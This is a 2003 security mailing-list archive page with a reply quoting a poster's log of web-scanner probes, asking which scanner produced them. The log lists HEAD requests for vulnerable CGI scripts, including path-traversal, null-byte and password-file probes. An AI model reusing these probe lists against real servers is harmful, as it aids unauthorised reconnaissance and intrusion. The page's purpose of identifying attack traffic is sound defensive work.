> HEAD /cgi-bin/phf HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/phf.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/php HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/php.cgi HTTP/1.0\x0a\x0a
> HEAD /phpgroupware/inc/phpgwapi/phpgw.inc.php HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/plusmail HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi?data_dir=/bin/ls%00 HTTP/1.0
> \x0a\x0a
> HEAD /cgi-bin/postings.cgi?
> action=reply&forum=&number=1&topic=000001.cgi&TopicSubject=&replyto=0 
> HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/post-query HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/processit.pl HTTP/1.0\x0a\x0a
> HEAD /PSUser/PSCOErrPage.htm HTTP/1.0\x0a\x0a
> HEAD /pservlet.html HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ipf/etc/gfw/ui/pwd.dat HTTP/1.0\x0a\x0a
> HEAD /Newuser?Image=../../database/rbsserv.mdb HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/redirect.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/register.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/responder.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/rpm_query HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/rwwwshell.pl HTTP/1.0\x0a\x0a
> HEAD /sawmill HTTP/1.0\x0a\x0a
> HEAD /scancfg.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/search.cgi?letter= HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/Search.pl HTTP/1.0\x0a\x0a
> HEAD /ROADS/cgi-bin/search.pl HTTP/1.0\x0a\x0a
> HEAD /inc/sendmail.inc HTTP/1.0\x0a\x0a
> HEAD /setpasswd.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/simplestguest.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/simplestmail.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0\x0a\x0a
> HEAD /html/snort2html.html HTTP/1.0\x0a\x0a
> HEAD /snort2html.html HTTP/1.0\x0a\x0a
> HEAD /site/eg/source.asp HTTP/1.0\x0a\x0a
> HEAD /secret/secret/sql_tool.shtml HTTP/1.0\x0a\x0a
> HEAD /cd-cgi/sscd_suncourier.pl HTTP/1.0\x0a\x0a
> HEAD /stat.htm HTTP/1.0\x0a\x0a
> HEAD /stats.htm HTTP/1.0\x0a\x0a
> HEAD /stats.html HTTP/1.0\x0a\x0a
> HEAD /stats.txt HTTP/1.0\x0a\x0a
> HEAD /scripts/submit.cgi HTTP/1.0\x0a\x0a
> HEAD /users/scripts/submit.cgi HTTP/1.0\x0a\x0a
> HEAD /submit.php?CONF=anything HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/subscribe.pl HTTP/1.0\x0a\x0a
> HEAD /subscribe.pl?testat_private HTTP/1.0\x0a\x0a
> HEAD /survey HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/survey.cgi HTTP/1.0\x0a\x0a
> HEAD /technote/main.cgi/oops?
> board=FREE_BOARD&command=down_load&filename=/../../../main.cgi HTTP/1.0
> \x0a\x0a
> HEAD /technote/print.cgi HTTP/1.0\x0a\x0a
> HEAD /test/test.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/test-cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/textcounter.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/search/tidfinder.cgi?2956734 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ultraboard.cgi HTTP/1.0\x0a\x0a
> HEAD /ultraboard.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/unlg1.1 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/unlg1.2 HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/upload_file.pl HTTP/1.0\x0a\x0a
> HEAD /user.php&op=saveuser HTTP/1.0\x0a\x0a
> HEAD /cgi-auth/userreg.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/ustorekeeper.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/view_page.html HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/view-source HTTP/1.0\x0a\x0a
> HEAD /search97cgi/vtopic HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/w3-msql HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/wais.pl HTTP/1.0\x0a\x0a
> HEAD /way-board/way-board.cgi HTTP/1.0\x0a\x0a
> HEAD /webaccess.htm HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webdata.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webdist.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webdriver HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webgais HTTP/1.0\x0a\x0a
> HEAD //WEB-INF/ HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/replicator/webpage.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webplus.cgi?Script=/webplus/webping/webping.wml HTTP/1.0
> \x0a\x0a
> HEAD /cgi-bin/websendmail HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webspirs.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/webwho.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/scripts/whois.cgi?action=load&whois=check HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/whois_raw.cgi HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/wrap.cgi HTTP/1.0\x0a\x0a
> HEAD /WSFTP.LOG HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/wwwboard.pl HTTP/1.0\x0a\x0a
> HEAD /cgi-bin/www-sql HTTP/1.0\x0a\x0a
> OPTIONS / HTTP/1.1\x0d\x0atranslate: f\x0d\x0aUser-Agent: Microsoft-
> WebDAV-MiniRedir/5.1.2600\x0d\x0aHost: 159.37.8.1\x0d\x0aContent-Length: 0
> \x0d\x0aConnection: Keep-Alive\x0d\x0a\x0d\x0a
> SEARCH / HTTP/1.0\x0d\x0a\x0d\x0a
> 
> Thanks for any leads,
> Dean
> 
> ----------------------------------------------------------------------------
> Powerful Anti-Spam Management and More...
> SurfControl E-mail Filter puts the brakes on spam,
> viruses and malicious code. Safeguard your business
> critical communications. Download a free 30-day trial:
> http://www.securityfocus.com/SurfControl-incidents
-- 
 ________________________________________________
| Laurent Luyckx
|
application/pgp-signature attachment: This is a digitally signed message part
Next message: Jerry Shenk: "RE: Does anyone recognize the scanner that causes this pattern ?"
Previous message: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
In reply to: deanat_private: "Does anyone recognize the scanner that causes this pattern ?"
Next in thread: Jerry Shenk: "RE: Does anyone recognize the scanner that causes this pattern ?"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Mon Apr 07 2003 - 15:36:43 PDT